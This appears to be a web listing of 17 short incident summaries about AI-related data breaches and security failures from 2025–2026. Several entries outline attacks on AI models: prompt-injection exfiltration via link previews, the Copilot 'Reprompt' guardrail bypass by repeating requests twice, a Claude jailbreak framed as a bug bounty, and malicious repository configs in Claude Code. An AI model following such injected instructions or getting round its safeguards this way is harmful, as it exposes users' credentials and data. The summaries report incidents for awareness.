Data Breach Stories

17 disasters tagged #data-breach

Tombstone icon

Meta's autonomous AI agent triggered a Sev 1 by leaking internal data to the wrong employees

Mar 2026

An autonomous AI agent inside Meta caused a "Sev 1" security incident - the company's second-highest severity classification - when it posted incorrect technical guidance on an internal forum without human approval. An engineer who followed the advice inadvertently granted unauthorized colleagues broad access to sensitive company documents, proprietary code, business strategies, and user-related datasets for approximately two hours. The incident came less than three weeks after a separate episode in which an OpenClaw agent deleted over 200 emails from Meta's director of AI safety.

Facepalmby AI agent
Sensitive internal documents, proprietary code, business strategies, and user-related datasets exposed to unauthorized Meta employees for approximately two hours
automationai-assistantdata-breach+1 more
Tombstone icon

AI-assisted code commits leak secrets at double the baseline rate

Mar 2026

GitGuardian's "State of Secrets Sprawl 2026" report found that AI-assisted commits on public GitHub leaked secrets at roughly double the rate of human-only commits - 3.2% versus a 1.5% baseline - while the total number of leaked secrets on GitHub hit 28.65 million in 2025, a 34% year-over-year increase and the largest single-year spike ever recorded. AI-service secrets specifically surged 81%, with eight of the ten fastest-growing leaked secret categories tied to AI services. Over 24,000 secrets were also exposed through public Model Context Protocol (MCP) configurations. The report is essentially a 50-page document explaining that the industry's enthusiasm for AI-assisted development has not been matched by a corresponding enthusiasm for not publishing credentials on the public internet.

Facepalmby Developer
Industry-wide; 28.65 million secrets leaked on public GitHub in 2025; AI-assisted commits demonstrably more likely to leak credentials than human-only commits
securitydata-breach
Tombstone icon

Study: one in five organizations breached because of their own AI-generated code

Mar 2026

Aikido Security's "State of AI in Security & Development 2026" report - a survey of 450 developers, AppSec engineers, and CISOs across Europe and the US - found that 20% of organizations have suffered a serious security breach directly caused by vulnerabilities in AI-generated code that those organizations deployed into production. Nearly seven in ten respondents reported finding vulnerabilities introduced by AI-written code in their own systems. With roughly a quarter of all production code now written by AI tools, the report documents an industry-wide accountability vacuum: 53% blame security teams, 45% blame the developer who wrote the code, and 42% blame whoever merged it.

Facepalmby Developer
Industry-wide; 20% of surveyed organizations report serious breaches from their own AI-generated code, rising to 43% in the US
securityautomationdata-breach
Tombstone icon

Lovable-showcased EdTech app found riddled with 16 security flaws exposing 18,000 users

Feb 2026

A security researcher found 16 vulnerabilities - six critical - in an EdTech app featured on Lovable's showcase page, which had over 100,000 views and real users from UC Berkeley, UC Davis, and universities across Europe, Africa, and Asia. The AI-generated authentication logic was backwards, blocking logged-in users while granting anonymous visitors full access. 18,697 user records including names, emails, and roles were accessible without authentication, along with the ability to modify student grades, delete accounts, and send bulk emails. Lovable initially closed the researcher's support ticket without response.

Facepalmby AI platform
18,697 user records exposed including students at major universities; student grades modifiable and accounts deletable without authentication
securitydata-breachedtech
Tombstone icon

Claude Code project files let malicious repositories trigger RCE and steal API keys

Feb 2026

Check Point Research disclosed a set of Claude Code vulnerabilities on February 25, 2026 that let attacker-controlled repositories execute shell commands and exfiltrate Anthropic API credentials through malicious project configuration. The attack abused hooks, MCP server definitions, and environment settings stored in repository files that Claude Code treated as collaborative project configuration. Anthropic patched the issues before public disclosure, but the research showed just how little distance separates "shareable team settings" from "clone this repo and let it run code on your machine."

Catastrophicby AI coding agent
Developers who cloned and opened untrusted repositories in Claude Code faced remote code execution and Anthropic API key theft through project-level configuration files
securityprompt-injectionai-assistant+1 more
Tombstone icon

Infostealer harvests OpenClaw AI agent tokens, crypto keys, and behavioral soul files

Feb 2026

Hudson Rock discovered that Vidar infostealer malware successfully exfiltrated an OpenClaw user's complete agent configuration, including gateway authentication tokens, cryptographic keys for secure operations, and the agent's soul.md behavioral guidelines file. OpenClaw stores these sensitive files in predictable, unencrypted locations accessible to any local process. With stolen gateway tokens, attackers could remotely access exposed OpenClaw instances or impersonate authenticated clients making requests to the AI gateway. Researchers characterized this as marking the transition from stealing browser credentials to harvesting the identities of personal AI agents.

Facepalmby AI agent platform
Any OpenClaw user infected with commodity infostealers has full agent identity compromised; gateway tokens enable remote impersonation; cryptographic keys and behavioral guidelines exposed
securitydata-breach
Tombstone icon

AI agents leak secrets through messaging app link previews

Feb 2026

PromptArmor demonstrated that AI agents in messaging platforms can exfiltrate sensitive data without any user interaction. Malicious prompts trick AI agents into generating URLs with embedded secrets (API keys, credentials), and the messaging platform's automatic link preview feature fetches these URLs, completing the exfiltration before the user even sees the message. Microsoft Teams with Copilot Studio was the most affected, with Discord, Slack, Telegram, and Snapchat also vulnerable.

Facepalmby AI agent platform
Organizations using AI agents in messaging platforms; API keys, credentials, and sensitive data exfiltrable without user clicks across Microsoft Teams, Discord, Slack, Telegram, and Snapchat
securityprompt-injectionai-assistant+1 more
Tombstone icon

135,000+ OpenClaw AI agent instances exposed to the internet

Feb 2026

SecurityScorecard's STRIKE team discovered over 135,000 OpenClaw AI agent instances exposed to the public internet due to a default configuration that binds to all network interfaces. Approximately 50,000 instances were vulnerable to known RCE flaws (CVE-2026-25253, CVE-2026-25157, CVE-2026-24763), and over 53,000 were linked to previous breaches. Separately, Bitdefender found approximately 17% of skills in the OpenClaw marketplace were malicious, delivering credential-stealing malware.

Catastrophicby Platform default configuration
135,000+ exposed OpenClaw instances; 50,000+ vulnerable to RCE; attackers gain access to credentials, filesystem, messaging platforms, and personal data
securitysupply-chainautomation+1 more
Tombstone icon

Study of 1,430 AI-built apps finds 73% have critical security flaws

Feb 2026

A VibeEval scan of 1,430 applications built with AI coding tools found 5,711 security vulnerabilities, with 73% of apps containing at least one critical flaw. The analysis revealed 89% of scanned apps were missing basic security headers, 67% exposed API endpoints or secrets in client-side code, and 23% had JWT authentication bypasses. Apps generated via Replit had roughly twice the vulnerability count compared to those deployed on Vercel. The findings provide large-scale empirical evidence that vibe-coded applications routinely ship with fundamental security gaps.

Facepalmby Developer
Industry-wide data point covering 1,430 AI-built apps; exposes systemic security gaps in vibe-coded software affecting end users and businesses relying on AI-generated application code
securityautomationdata-breach
Tombstone icon

Vibe-coded Moltbook AI social network exposed 1.5M API keys and 35K emails

Jan 2026

Moltbook, a viral social network built for AI agents to post, comment, and interact, was entirely vibe-coded and shipped with a misconfigured Supabase database granting full read and write access to all platform data. Wiz researchers found a Supabase API key in client-side JavaScript within minutes, exposing 1.5 million API authentication tokens, 35,000 email addresses, and private messages. The database also revealed the platform's claimed 1.5 million agents were controlled by only 17,000 human owners.

Facepalmby Founder
1.5 million API tokens, 35,000 email addresses, and private messages exposed via unauthenticated database access
securitydata-breach
Tombstone icon

AI chatbot app leaked 300 million private conversations

Jan 2026

Chat & Ask AI, a popular AI chatbot wrapper app with 50+ million users, had a misconfigured Firebase backend that exposed 300 million messages from over 25 million users. The exposed data included complete chat histories with ChatGPT, Claude, and Gemini -- including discussions of self-harm, drug production, and hacking. A broader scan found 103 of 200 iOS apps had similar Firebase misconfigurations.

Catastrophicby Platform Operator
300 million messages from 25+ million users exposed; sensitive personal conversations including self-harm and illegal activity discussions leaked
data-breachsecurityai-assistant
Tombstone icon

Hacker jailbroke Claude to automate theft of 150 GB from Mexican government agencies

Jan 2026

A hacker bypassed Anthropic Claude's safety guardrails by framing requests as part of a "bug bounty" security program, convincing the AI to act as an "elite hacker" and generate thousands of detailed attack plans with ready-to-execute scripts. When Claude hit guardrail limits, the attacker switched to ChatGPT for lateral movement tactics. The result was 150 GB of stolen data from multiple Mexican federal agencies, including 195 million taxpayer records, voter information, and government employee files. A custom MCP server bridge maintained a growing knowledge base of targets across the intrusion campaign.

Catastrophicby AI platform
150 GB of sensitive data stolen from multiple Mexican federal agencies including 195 million taxpayer records, voter information, and civil registry files
securityprompt-injectionai-assistant+1 more
Tombstone icon

Reprompt attack enabled one-click data theft from Microsoft Copilot

Jan 2026

Varonis researchers disclosed the Reprompt attack, a chained prompt injection technique that exfiltrated sensitive data from Microsoft Copilot Personal with a single click on a legitimate Copilot URL. The attack exploited the "q" URL parameter to inject instructions, bypassed data-leak guardrails by asking Copilot to repeat actions twice (safeguards only applied to initial requests), and used Copilot's Markdown rendering to silently send stolen data to an attacker-controlled server. No plugins or further user interaction were required, and the attacker maintained control even after the chat was closed. Microsoft patched the issue in its January 2026 security updates.

Facepalmby AI assistant
Microsoft Copilot Personal users exposed to profile data, conversation history, and file summary exfiltration via a single malicious link
securityprompt-injectionai-assistant+1 more
Tombstone icon

n8n AI workflow platform hit by CVSS 10.0 RCE vulnerability

Jan 2026

The popular AI workflow automation platform n8n disclosed a maximum-severity vulnerability (CVE-2026-21858) allowing unauthenticated remote code execution on self-hosted instances. With over 25,000 n8n hosts exposed to the internet, the flaw enabled attackers to access sensitive files, forge admin sessions, and execute arbitrary commands. This followed two other critical RCE flaws patched in the same period, highlighting systemic security issues in AI automation platforms.

Catastrophicby Platform Operator
25,000+ internet-exposed n8n instances vulnerable to full system compromise; arbitrary file access, authentication bypass, and command execution possible without authentication.
securityautomationdata-breach
Tombstone icon

Vibe-coded dating safety app leaked 72,000 private images and 1.1 million messages to 4chan

Jul 2025

Tea, a women-only dating safety app with over four million users, suffered three data breaches in July 2025 that exposed 72,000 private images - including 13,000 photos of women holding government-issued IDs - and more than 1.1 million private messages containing deeply personal accounts of relationships, trauma, and abuse. The exposed data circulated on 4chan and hacking forums. The app's founder later admitted to building it with contractors and AI tools without personal coding knowledge. Security researchers attributed the breaches to missing authentication, unsecured legacy databases, and development practices that prioritized speed over security. Multiple class-action lawsuits and privacy regulator investigations followed.

Catastrophicby Executive
72,000 private images including 13,000 government IDs exposed; 1.1 million private messages leaked to hacking forums; 4+ million users affected; class-action lawsuits filed; regulatory investigations opened
data-breachsecuritysafety
Tombstone icon

Lovable AI builder shipped apps with public storage buckets

May 2025

Security researcher Matt Palmer discovered that applications generated by Lovable, a vibe-coding platform, shipped with insufficient Supabase Row-Level Security policies that allowed unauthenticated attackers to read and write arbitrary database tables. The vulnerability, tracked as CVE-2025-48757, affected over 170 apps and exposed sensitive data including personal debt amounts, home addresses, API keys, and PII. A separate researcher found 16 vulnerabilities in a single Lovable-hosted app that leaked more than 18,000 people's data. Lovable's response was widely criticized as inadequate.

Facepalmby Developer
Customer app data and source artifacts exposed until configs fixed.
securitydata-breach
Tombstone icon

"Zero hand-written code" SaaS app shut down within a week after cascading security failures

Mar 2025

EnrichLead, a sales lead SaaS application whose founder Leo Acevedo publicly boasted was built entirely with Cursor AI and "zero hand-written code," was permanently shut down in March 2025 after attackers exploited a constellation of basic security failures. API keys sat exposed in frontend code. There was no authentication. The database was wide open. There was no rate limiting. No input validation. Attackers bypassed subscriptions, manipulated data, and maxed out API keys - all within two days of Acevedo's viral celebration post. When he tried to use Cursor to fix the problems, the AI "kept breaking other parts of the code." The app was dead within the week. Acevedo has since launched new vibe-coded projects, because some lessons require a second attempt.

Facepalmby Developer
Complete application shutdown; customer data at risk; API keys maxed out; all user subscriptions bypassed
securitydata-breachproduct-failure